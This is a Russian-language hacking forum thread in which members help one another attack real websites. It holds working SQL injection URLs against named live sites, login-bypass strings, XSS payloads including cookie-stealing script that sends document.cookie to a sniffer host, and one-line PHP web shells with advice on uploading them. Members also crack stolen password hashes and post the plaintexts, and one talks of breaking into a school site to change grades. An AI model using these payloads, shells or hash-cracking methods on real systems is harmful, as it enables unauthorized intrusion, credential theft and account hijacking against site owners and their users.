[QUOTE]http://site.com/non.php?id=-6+union+select+1,concat(table_schema,0x2e,table_na me,0x3a,column_name),3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
и скажи тут результ..

http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'+limit+1,1--
также
http://site.com/non.php?id=-6+union+select+1,concat(table_schema,0x2e,table_na me,0x3a,column_name),3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
и скажи тут результ..

по первому запросу - так же пусто, ни какой информации не выводит.

а по второму вот:

information_schema.ROUTINES:SQL_ADMIN

В принципе то же самое что и в моем случае, только дальше, делаю запрос, опять пусто.

НиПоНяТнО (голосом Реввы)

дай ссыль в личку

Всем привет!

Разъясните...

Есть скуля - information_schema - доступно.

далее:

вываливаются куча всего и там я выцепляю routines:sql_admin
далее:

ошибка:
Table 'db.routines' doesn't exist
ага, значит все в другой базе.
далее смотрю в какой именно базе:

отображается "information_schema"
подставляю:

Страница без ошибок обновляется, но ни какой инфы нет.

Тут меня терзают сомнения:
1. Корректно ли я указал "information_schema.routines"
2. Может быть у меня не хватает прав?
3. Или где-то накосячил изначально?

Спасибо!

Да ты ж синтаксиса sql команд не понимаешь!!! Доки читай по мускулу! хеккеры млин...
Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),ta ble_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables--
потом уже смотришь названия колонок в интересующей таблице:
http://site.com/non.php?id=-6+union+select+1,2,COLUMN_NAME,4,5,6,7,8+from+INFO RMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME="user"--

А уже потом на основе этих данных составляешь запрос!

_Pantera_
Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),ta ble_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables --

таким запросом ты узнаеш все бд )

а вот таким запросом ты посмотришь БД в которых лежит таблица..
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema),4, 5,6,7,8+from+information.tables+where+table_name=� �азвание таблы--

а вобще я бы сначало искал в каких таблицах и бд есть колонка например пасс)
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema,tab le_name),4,5,6,7,8+from+information.columns+where+ column_name+like+char(название поля)--

_Pantera_
Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),ta ble_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables --
таким запросом ты узнаеш все бд )




Я вот непонимаю, зачем если ты не разбираешься в теме умничать?

table_schema - имя БД
table_NAME - имя таблицы


а вот таким запросом ты посмотришь названия таблиц и названия БД в которых они лежат..
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema),4, 5,6,7,8+from+information.tables+where+table_name=� � азвание таблы--

А это что за бред???? Этим запросом ты посмотришь имя БД в которой лежит таблица "название таблы"


PS Мужики читайте литературу, я смотрю вы нахватались кусков из хеккерских форумов, а работать с БД не умеете.

Всем спасибо!
Все что нужно стянул.
sabe, a+

2pantera прав хватает по любому) потому что этот файл index.php этого же сайта)

вопрос..как преобразовать пхп-код в одну строку?иными словами чтобы не было пробелов...всё в одной строке?
шелл короче залить..

Попробуй перевести его в16битное шифрование.

Да ты ж синтаксиса sql команд не понимаешь!!! Доки читай по мускулу! хеккеры млин...
хех товарищ хакер обратите внимание на эти строчки в цитате:
ошибка: Table 'db.routines' doesn't exist ага, значит все в другой базе. далее смотрю в какой именно базе: отображается "information_schema"
во первых он сделал это без вас, во-вторых зачем ему весь список "баз(а/ы)-таблицы" если известно конкретное название таблицы?) пост sabe верный ток там оператор объединения непонятно зачем)
Octave_Parango значит либо нет записей либо есть пустые строки ;)
masternet пхп шелл итак занимает 1 строчку ;) всё остальное навороты
вот самый короткий) raz0r.name/releases/mega-reliz-samyj-korotkij-shell/

хех товарищ хакер обратите внимание на эти строчки в цитате:
ошибка: Table 'db.routines' doesn't exist ага, значит все в другой базе. далее смотрю в какой именно базе: отображается "information_schema"
во первых он сделал это без вас, во-вторых зачем ему весь список "баз(а/ы)-таблицы" если известно конкретное название таблицы?) пост sabe верный ток там оператор объединения непонятно зачем)


Ошибка говорит о том, что в БД под именем db таблицы "routines" не существует!
А дальше ты хоть сам понял, что написал?
далее смотрю в какой именно базе: отображается "information_schema"
Интересно, что тогда по твоему "information_schema", таблица чтоле?
information_schema - это название стандартной БД в мускуле 5!)

Товарищи, прошу совета.

Добил необходимый мне ресурс. Там стоит походу вродпресс.
Вытащил значит следующие данные

(логин::пасс)
admin::$P$BaDgEI.EOMBqxOK7SWSWJfbPHfiVDT.
mary::$P$BQOOK8uZGPy9aPW/iZFQdVCYqfFEIe/
tom::$P$BMUL.P.H2ij4tFvv0RcZ.moF0RWId10

Это что вообще такое? o_O Это расшифровать реально (если это вообще хэши)?
Если да-то ткните как плз.
Я просто первый раз столкнулся, в недоумении...

похоже на юниксовый мд5, но там вроде на $1$ начинаться должно...

или md5(phpbb3), что скорее всего

Значит PasswordsPro мне в руки и долгие годы ожидания и терпимости, или есть иные варианты? Сервисы не берут, в пассвордспро я такого типа хешей вообще не обнаружил, как md5(phpbb3)
Кто может помочь? Об оплате договоримся ;)

http://forum.xakep.ru/m_1107118/tm.htm и еще вот тут можно почитать

Спасибо. Уже вникаю =)

_Pantera_,
Ошибки свои понял.
Спасибо!

Пытаюсь авторизоватся по типу
email:pass
Мыло не знаю, поэтому ввожу от балды. Кавычки фильтруются
SELECT * FROM t_customer WHERE (email='admin@admin.com\') AND (password='or 1=1--')
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1

Как можно обойти фильтрацию и авторизоватся?

Пытаюсь авторизоватся по типу
email:pass
Мыло не знаю, поэтому ввожу от балды. Кавычки фильтруются


Как можно обойти фильтрацию и авторизоватся?
По всей видимости есть sql-инъекция, попробуй найти табличку юзеров/админов, там должно быть достаточно информации, чтобы пройти авторизацию ; )

По логике t_customer. Я поискал, иньекция только в авторизации.
и только в поле логина

будет работать когда
SELECT * FROM t_customer WHERE (email='admin@admin.com' or 1=1/*) AND (password='')

обойти фильтр кавычки можна так: %27,%2527,` в разных случаях по разному, тоесть пример

mail:a@a.a%2527 or 1=1/*
pass:

Ошибка говорит о том, что в БД под именем db таблицы "routines" не существует!
А дальше ты хоть сам понял, что написал?

Интересно, что тогда по твоему "information_schema", таблица чтоле?
information_schema - это название стандартной БД в мускуле 5!)
c вами бесполезно спорить вы второй раз читаете пост по диагонали надо быть внимательнее.
Ershik после обратного слеша одна ковычка? никак если данные не попадают в urldecode()

Понятно. еще вопрос.
__http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8.9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36/*

почему, когда хочу узнать версию базы данных, выскакиет ошибка?
___http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,database(),4,5,6,7,8.9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36/*

проблемы с кодировкой используй конструкцию aes_decrypt(aes_encrypt())

/add jokester опередил с примером '(

Неа. Это не помогает. почему-то.

Неа. Это не помогает. почему-то.
отлично помогает :)
http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,UNHEX(HEX(concat_ws(0x3a,User() ,Database(),Version()))),4,5,6,7,8.9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36/*

administrator@localhost:gestione:4.1.11-Debian_4sarge7-log

И это тоже разумеется :
http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,User(),Database(),Version()),1),1),4,5,6,7 ,8.9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36/*

Я осознал.
Спасибо :)

При исполнении следующих запросов :

page.php?id=-1'+order+by+3/* :

Unknown column '3' in 'order clause' (Казалось бы все нормально, НО!)

page.php?id=-1'+order+by+2/*

Выдает :

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

Что это означает? И как это победить?

При исполнении следующих запросов :

page.php?id=-1'+order+by+3/* :

Unknown column '3' in 'order clause' (Казалось бы все нормально, НО!)

page.php?id=-1'+order+by+2/*

Выдает :

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

Что это означает? И как это победить?
так мож тут 2 колонки.
попробуй терь page.php?id=-1'+union+select+1,2/*

Там и есть 2 колноки, но при запросе page.php?id=-1'+union+select+1,2/* :

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

нужно указать группировку по полю (у вас конец запроса обрывается комментариями), т.е.
ляляля + group by поле/*

Я не уверен в том что это серьезный баг, вконтакте если зайти в свой аккаунт, раздел "мои группы" - справа вверху форма "фильтр групп".
В этой форме выполняется
"><script>alert('test')</script>

Код формы

<div class="groupsLookupCont"><input placeholder="Фильтр групп" id="g_filter" class="inputText" onkeyup="if (window.rs) {rs.lookup(this, event);}" type="text"></div>
<script type="text/javascript">
placeholderSetup('g_filter');
</script>

Собственно вопрос такой: можно ли сформировать ссылку XSS?

Ничего себе несерьезная уязвимость:) Есс-но можно

Я не уверен в том что это серьезный баг, вконтакте если зайти в свой аккаунт, раздел "мои группы" - справа вверху форма "фильтр групп".
В этой форме выполняется


Код формы



Собственно вопрос такой: можно ли сформировать ссылку XSS?


если кто смог,выложите сформированную ссылку,у меня не получилось(

Видишь ли, я просто там незареген, вывод - ссылку в студию +ПОЛНЫЙ исходник страницы

Видишь ли, я просто там незареген, вывод - ссылку в студию +ПОЛНЫЙ исходник страницы

http://vkontakte.ru/groups.php?

исходник большой очень( стоит ли его сдесь выкладывать

2qazer
именно это. Исходник действительно большой, да и толку от него маловато.
Алерт выскакивает на странице прям в тот момент когда его вставляешь. Там Ajax вроде

2qazer
именно это. Исходник действительно большой, да и толку от него маловато.
Алерт выскакивает на странице прям в тот момент когда его вставляешь. Там Ajax вроде

тоесть получается прамую ссылку не поставить?алерт выскакивает если его ввести в поле и нажать enter - так тоже катит

тоесть получается прамую ссылку не поставить?алерт выскакивает если его ввести в поле и нажать enter - так тоже катит

Я вот это впринципе и хотел узнать. Скрипт обрабатывается "на ходу". Но ведь обрабатывается и выполняется. Есть ли способ передать скрипт через ссылку в эту форму?

я на самом деле тоже самое хочу узнать)))

помоему надо просто узнать название этого поля и подставить его,чтото типо этого --

http://vkontakte.ru/groups.php?название поля=<script>alrtr(/)</script>

http://vkontakte.ru/groups.php?название поля=<script>alrtr(/)</script>

Я пробовал так, у меня не получилось. Тут моих познаний java script не хватает к сожалению.

Смотрю: олени в теме :D

Вообщем если пашка дуров не поставил:
<?php
echo $_GET['имя_поля'];
?>

То ничего не сделал, а он действительно не поставил :)

Смотрю: олени в теме :D

Хм, я возможно и не шарю, но если я не ошибся тема как раз таки для вопросов по уязвимостям. Так что думаю можно и без оленей обойтись)


Вообщем если пашка дуров не поставил:
<?php
echo $_GET['имя_поля'];
?>

То ничего не сделал, а он действительно не поставил :)

А здесь можно поподробней? Возможно данные в форму передать каким нибудь образом?

Это уже пофиксено все... думаю надо копать глубже.. и еще всетаки интересно в привате есть сплойты или нет..

Это уже пофиксено все... думаю надо копать глубже.. и еще всетаки интересно в привате есть сплойты или нет..


всё работает!!!!

"><script>img = new Image(); img.src = "http://блаблаблабла?"+document.cookie;</script>

и куки на снифе!!!


ктонить составьте ссылку

всё работает!!!!

"><script>img = new Image(); img.src = "http://блаблаблабла?"+document.cookie;</script>

и куки на снифе!!!


ктонить составьте ссылку
я говорил про вконтакте.ру

Хм, я возможно и не шарю, но если я не ошибся тема как раз таки для вопросов по уязвимостям. Так что думаю можно и без оленей обойтись)



А здесь можно поподробней? Возможно данные в форму передать каким нибудь образом?
никаким, если только юзер сам не вставит код :)

Нашел уязвимость с Ассеsse, пытаюсь авторизоваться по типу:
user = ' or '1'='1
pass = test
Но выбрасывает на ошибку с
Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC Microsoft Access Driver]General error Unable to open registry key 'Temporary (volatile) Jet DSN for process 0x17ec Thread 0x1420 DBC 0x31b710c Jet'.

/riservata.asp, line 18

Расшифруйте, пожалуйста, что тут не так. если дословно: общая ошибка открытом регистрационном ключе, DNS процесса и бла-бла-ла

Calcutta, всё поддерживается, не сбивай людей с толку!

Я все делал по статье. все верно.
Еще выяснил, что при любом запросе:
админ:админ.
лол:кол

выбрасывает на ошибку. Может такое быть, что авторизоваться не получится?

Warning: require_once(maincore.php) [function.require-once]: failed to open stream: Operation not permitted in /www/hmarka.net/3/8/38school/home/site/news.php on line 12

Fatal error: require_once() [function.require]: Failed opening required 'maincore.php' (include_path='.:/usr/share/php') in /www/hmarka.net/3/8/38school/home/site/news.php on line 12

ето че такое и как етим воспользоваться???

увидеть пути ..
возрадоватся что ошибки не отключены в этом скрипте, и возможно на всём сайте, что очень облегчит дальнейший взлом..

круто а вот че мне делать дальш???

круто а вот че мне делать дальш???
попрыгать на левой ноге, сьесть яйцо в смятку, выпить пол литру молока, подтянутся 23 раза и зайти на php.net и mysql.com .. почитать ..
также рекомендуется зайти в раздел /forum30.html и тоже почитать ..

--------
.зы из ошибки, я понял что это нечто типо сайта школы /38school/
Не стоит ломать с надеждой поменять себе отметки!

круто а вот че мне делать дальш???
Почитай, может поможет:
http://forum.antichat.ru/thread91807.html

_http://www.vs.motorolka.ru/forum/index.php?showtopic=-1+limit+1,1+union+select+1,2,3--
интересует скули такого вида..их ведь так крутить надо?сначала лимит,а потом юбнион+целест?

.зы из ошибки, я понял что это нечто типо сайта школы /38school/
Не стоит ломать с надеждой поменять себе отметки!
да ты прав))) Отметки потом сменю у меня и у всей школе протест!!! Они нас в школе запирают и не выпускают некуда токо после уроков всех(((( Взломаю потом я его задосил с деда)))

вопрос может не в тему но нужен шел))) на форуме ищу никак ненайду что найду непашут ссылки(( выложите кто-то

<?passthru($_GET[cmd]);?>

<?=@`$c`?>
short_open_tag и register_globals required=\

(c) Raz0r ;)

c99comandshell
http://madnet.name/files/1/10.html

Нашёл пару xss ,но не могу понять как составить ссылку с адресом сниффера.Помогите,я туплю)

http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

собственно вставка вместо алерта запроса на снифер,вида

<script>img = new Image(); img.src = "блаблабла?"+document.cookie;</script>

не пашет((


В благодарность за ваши советы вот ещё xss (будет супер,если ктонить объяснит как составить ссылки на сниф,т.к. в следующих ,подстановка по методу выше тоже не пашет)

http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

не работает по ЭТОЙ ссылке xss

http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

тут всместо alert(document.cookie) просто вставь

window.location.href='http://твой_сайт_со_снифером/s.phpf?'+document.cookie;

тут

http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

нет xss

тут

http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

нет xss

тут

http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

нет xss

хммм. у меня в IE алерт вылезает по всем ссылкам

и что, а у меня опера, xss с расчетом на один браузер - гопота. Ну если так хочется надеятся, что чел, кому ты скинешь ссылку, содержащую пассивную xss, будет именно в осле сидеть, то делай тоже самое:

вместо alert(document.cookie) просто вставь

window.location.href='http://твой_сайт_со_снифером/s.phpf?'+document.cookie;

Помогите с одной проблемой пожалста,

Fatal error: Cannot use object of type DB_Error as array in /home/shytobuy/domains/shytobuy.com/public_html/product.php on line 85

есть сайт, подобрал к нему колличество колонок, походу правильное потомучто если добавить еще одну ошибка меняется на вот такую

Fatal error: Cannot use object of type DB_Error as array in /home/shytobuy/domains/shytobuy.com/public_html/lib/site_common.php on line 123

сам запрос выглядит вот так

http://www.shytobuy.com/product.php?prod_id=1316+union+select+null,null,nu ll,null,null,null,null/*

проблема в том что сайт не дает добро ни на какое количество колонок, постоянно выводится ошибка, как с этим можно бороться и что вообще можно тут придумать...

спасибо за ответы

У меня есть достук к фтп (логин пасс) заливать надо етот шел туда c99comandshell???

залил а оно не заходит туда(((
Forbidden
You don't have permission to access /shell on this server.

вот че пишет

права поменяй иль залей в др. папку ..

Та не там кажеться дело в самом сайте. Забил на него

Выстави пасс и зайди.

Подскажите...
Это MD5?- 1114168c640b7642fd41f0b59fad1db4

да

Что-то не хочет поддаваться расшифровки...
Где бы еще попробовать его вскрыть?

Подскажите...
Это MD5?- 1114168c640b7642fd41f0b59fad1db4
да
Что-то не хочет поддаваться расшифровки... Где бы еще попробовать его вскрыть?
на здоровье...
1114168c640b7642fd41f0b59fad1db4:SWshop$

Iceangel_,
Благодарю!

Ого, тут вот еще что нашлось, не подскажите, что это:

122e1ba2246e3a0a

?

подскажите, где вскрыть его?

Ого, тут вот еще что нашлось, не подскажите, что это:

122e1ba2246e3a0a

?
это скорее всего MySQL

Нашёл пару xss ,но не могу понять как составить ссылку с адресом сниффера.Помогите,я туплю)

http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

собственно вставка вместо алерта запроса на снифер,вида

<script>img = new Image(); img.src = "блаблабла?"+document.cookie;</script>

не пашет((


В благодарность за ваши советы вот ещё xss (будет супер,если ктонить объяснит как составить ссылки на сниф,т.к. в следующих ,подстановка по методу выше тоже не пашет)

http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

в большинстве случаях фильтруются некоторые символы, например "+".



и что, а у меня опера, xss с расчетом на один браузер - гопота.

да, но иногда другого варианта нету. + приемы кроссбраузерности никто не отменял.

Ого, тут вот еще что нашлось, не подскажите, что это:
122e1ba2246e3a0a
?

это Mysql-хеш... точно...

подскажите, где вскрыть его?

на форуме есть специальная тема, для расшифровки хешей, пости там

P.S
122e1ba2246e3a0a:dataB88

это Mysql-хеш... точно...



на форуме есть специальная тема, для расшифровки хешей, пости там

P.S
122e1ba2246e3a0a:dataB88


Примного благодарен.
Про ветку - исправлюсь.

чем кроме сипта можно брутить таблицы?
т.к. в сипте пишет при запуске не достаёт компонентов..

чем кроме сипта можно брутить таблицы?
т.к. в сипте пишет при запуске не достаёт компонентов..
я конечно до конца не осознал каким боком это относится к теме уязвимостей, но всё же отвечу - я бручу самопалом .. )

есть ли прога для копирования всех таблиц/столбцов в один файл?а то не кайф хз скок раз лимит увеличивать(

есть ли прога для копирования всех таблиц/столбцов в один файл?а то не кайф хз скок раз лимит увеличивать(
ты что плетёшь ? какая прога для копирования таблиц в файл ? напиши конкретно задачу .. а не пытайся измерить гаризонт в километрах ..

короче есть сайт.ком
на этом сайте надо посмотреть все таблицы и столбцы(они не выводятся все сразу,а выводится только первая строка)..
мне надо выдрать эти таблцы и колумны..

короче есть сайт.ком
на этом сайте надо посмотреть все таблицы и столбцы(они не выводятся все сразу,а выводится только первая строка)..
мне надо выдрать эти таблцы и колумны..
это делается обычным for'ом секунды за двадцать две ..
вот что тебе надо:
http://php.net/file_get_contents
http://php.net/for
http://php.net/fwrite

http://pashkela.narod.ru/progi/MySQL5tool.rar

пароль 123 - как раз для автоматизированного вывода

Pashkela чел..не выводит..пишет ноу дата..а у мну руками всё выводится..

ну хз тогда:) Дай ссыль в ПМ

нашел xss. а незнаю чё с ней делать.. кто подскажет? пс читал тему xss для новичков недогнал... можно подробнее где?

че там неясно? почитай про использование веб-сниффера, про принципы работы кукисов в общем.

Помогите дальше раскурить:

https://www.flintriverranchdogfood.net/customer_testimonials.php?testimonial_id=-11+union+select+1,2,3,4,5,version(),7,8--

information_schema просмотрел, но вывести на страницу че-то не могу, везде еррор table doesn't exist.

Попробуй перевести название таблицы в 16битный формат.

-m0rgan-,
Безрезультатно :(

-m0rgan-,
Безрезультатно :(


https://www.flintriverranchdogfood.net/customer_testimonials.php?testimonial_id=1+and+1=2 +union+select+1,2,3,4,5,table_name,7,8+from+inform ation_schema.tables--

Кто знает как моно воспользоваться вот этим? http://78.111.240.22/chat/skin4x-a/

????

geforce
можно сделать скрин .. потом помидитировать .. или ещё что ..

.зы ничего

хотя в http://78.111.240.22/chat/skin4x-a/templates/ есть пхп файлы но я там ничего интересного не нашёл ..

geforce
можно сделать скрин .. потом помидитировать .. или ещё что ..

.зы ничего

хотя в http://78.111.240.22/chat/skin4x-a/templates/ есть пхп файлы но я там ничего интересного не нашёл ..

Кроме того что можно сделать скрин .. потом помидитировать .. или ещё что ..

Нельзя не как туда шелу кинуть?

geforce, ты с помощью этого видишь названия некоторых переменных. Можешь их проверить, авось, они не инициализируются... А если скрипт опен соурс - то ты получаешь ровным счётом ничего =)

помогите найти xss) форум ipb. за адресом в личку.

все описанные баги не действуют,не могу поверить в неприступность )))

https://www.flintriverranchdogfood.net/customer_testimonials.php?testimonial_id=1+and+1=2 +union+select+1,2,3,4,5,table_name,7,8+from+inform ation_schema.tables--

Эту инфу я вывел, не получается со столбцами.

+where+table_name='имя таблицы'--

для столбцов column_name+from+information_schema+where+table_na me='tabla' (можно захексить)

Эту инфу я вывел, не получается со столбцами.Всё там отлично выводится, не понимаю в чём проблема, вывод-- лучше не бывает, всё сразу, не морочте голову, если что-то не выводится перечитайте ЛЮБУЮ статью по SQL инъекциям

для столбцов column_name+from+information_schema+where+table_na me='tabla' (можно захексить)
information_schema.columns может быть?
А хексить не можно, а нужно...

geforce
http://78.111.240.22/chat/info.php
вот те раскрытие пути


а вот ксска
http://78.111.240.22/chat/info.php?msg=<h1>XSS
их там ещё много - анализируй имена переменных

Ch3ck
ну да, поскорой писал =) нужно ли хексить - даж не смотрел на фильтрацию ;)

Есть некий сайт. Есть таблица admin с хешированными в md5 паролями.
Авторизация происходит с помощью "WWW-Authenticate: Basic".
Сам сайт написан на PHP
Можно ли встроить код таким образом, чтобы он работал по типу снифера?
То есть отлавливал пароли, передаваемые методом POST и сохранял их в отдельный файлик.
Можно ли такое сделать?

конечно можно =) если парва на редактирование файла есть (или необходимых модулей) =)

Такой вопрос.
Есть скуля 4-ка.
Ели удачно сбрутить название таблиц и столбцов, но нет полей для вывода, каким образом можно вывести инфу?

читаем мануалы http://forum.antichat.ru/threadnav43966-1-10.html делай поиск по фразе "3.ЧТО ДЕЛАТЬ ЕСЛИ ОТСУТСТВУЮТ ВЫВОДИМЫЕ ПОЛЯ."

Возможно ли проведение атаки, если на запросы
http://site.com/index.php?page=2
и
http://site.com/index.php?page%00bgg=2
выдается один и тот же результат? Как вообще реализуются "атаки на имя переменной"?

Работает ли php код в файлах .htpasswd и .htaccess?
Можно ли встроить туда свой код, чтобы перехватывались данные и сохранялись отдельным файлом?
Права на запись есть.

krypt3r
бред.. тот же самый результ изза ?
инклуд будет когда:
http://site.com/index.php?page=views&id=2
тогда:
http://site.com/index.php?page=..index.php%00&id=2

Octave_Parango
есть прога сипт.. качаеш мега словяк и вперед брутить..

Такой вопрос! Если есть сайт и на нем присутствует локальный инклуд! Как можно его раскрутить если на сайт загрузить ничего нельзя(ну по крайней мере такой функции нет в меню на сайта)!? Может есть какие-то пути? Или это просто нашел да и х*р с ним!?

пытался подставлять 1+order+by+1/* таже самая ошибка ... 1+order+by+5000000/* без изменений
пробуй +order+by+5000000 --
либо без плюсов, просто пробелы. Либо +group+by+1 -- и т.д.

вобщем вот: http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4--
а если вести http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4/* , то уже совсем другое вылазиет)

полей вроде 4

+group+by+1 вроде ошибок нет)

что дальше делать ?)))

http://cod5.nov.ru/serverstats.php?serverid=1+order+by+4-- - почувствуй разницу вот http://cod5.nov.ru/serverstats.php?serverid=1+order+by+5-- ???? НУ как??? А то хрень, что написал "Ghost0ff" все БРЕЕЕЕЕДДДД!!! Все делается Э Л Е М Е Н Т А Р Н О ! Можно и без group by !! Главное правильно поставить ' и - ! Практический все сайты которые я взломал, поддавались вот на такое http://site/index.php?page=-1+order+by+x
Нужно перед 1 поставить - ! Ну это обычно в твоем случае ничего ставить ненадо! Насчет поста "geforse" ты знаешь скорей самое простое это вообще ничего не ставить после "4" ))) Воть так http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4 - удачи))

сайты которые я взломал, поддавались вот на такое http://site/index.php?page=-1+order+by+x
Нужно перед 1 поставить - !

И зачем так нужно делать? Особенно если учесть что это не правильно.
Так нужно делать только потому что ты не знаком с синтаксисом SQL?

Хммм в большенстве случаев этот вариант прокатывает!!!

Скул инж. я еще хоть как нить знаю но вот с PHP может кто нибуть поможет???

Почитай здесь:
http://forum.antichat.ru/thread12123.html

Да с синтаксис SQL я знаю неоч! Но факт остается фактом! Этот вариант прокатывает во многих случаях!!!

Хммм в большенстве случаев этот вариант прокатывает!!!

Гениально! Главное сказать и не важно что не правильно.
Оператор order by сортирует результат запроса, а отсортировывать пустой результат (а со значением -1 другого и не будет) - не самая лучшая идея.
Использовать order by нужно только при существующих значениях.

Ошибка в данном случае была в использование /* - в новых версиях мускула нельзя не закрывать этот комментарий, а значит теперь обходимся комментариями '#' и '-- '.

Чего опять ему надо ?((

http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,version( ),3,4-- (безрезультатно()

serverstats.php?serverid=1+union+select+1,column_n ame,3,4+from+information_schema.columns.--
тоже /=

serverstats.php?serverid=1+union+select+1,column_n ame,3,4+from+information_schema.columns.+limit+1,1--

даже версию не посмотреть(

mysql error: The used SELECT statements have a different number of columns

читай:) Сначала кол-во колонок подбери

Блин на мой вопрос с ПХП кто нибуть ответит??? Если кто не видел вот он :
Такой вопрос! Если есть сайт и на нем присутствует локальный инклуд! Как можно его раскрутить если на сайт загрузить ничего нельзя(ну по крайней мере такой функции нет в меню на сайта)!? Может есть какие-то пути? Или это просто нашел да и х*р с ним!?

------------------------------------
Почитай здесь:
http://forum.antichat.ru/thread12123.html

Я там не понял как именно добавлять файл! Читал раз 5!!! Как китайский блин!!!

geforse
помоему 2 и 3 принтабельные.. но вывода не увидел, логический вывод:

http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,unhex(he x(version())),3,4+from+information_schema.tables--
5 ветка..
http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,unhex(he x(version())),3,4+from+mysql.user--
с правами

как раскрутить?

http://www.ushkalenko.ru/guestbook/index.php?mz_module=guestbook&mz_page=-1

Sanic1977
никак нема иьекта )

http://www.ushkalenko.ru/guestbook/index.php?mz_module=guestbook&mz_page=-1 инъект отсутствует

http://www.comingsoon.net/news.php?id=1'

Получил вот такой ответ

Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'

Есть ли тут injection? Если есть пожалуйста помогите раскрутить а то чет никак не могу понять как запросик зделать.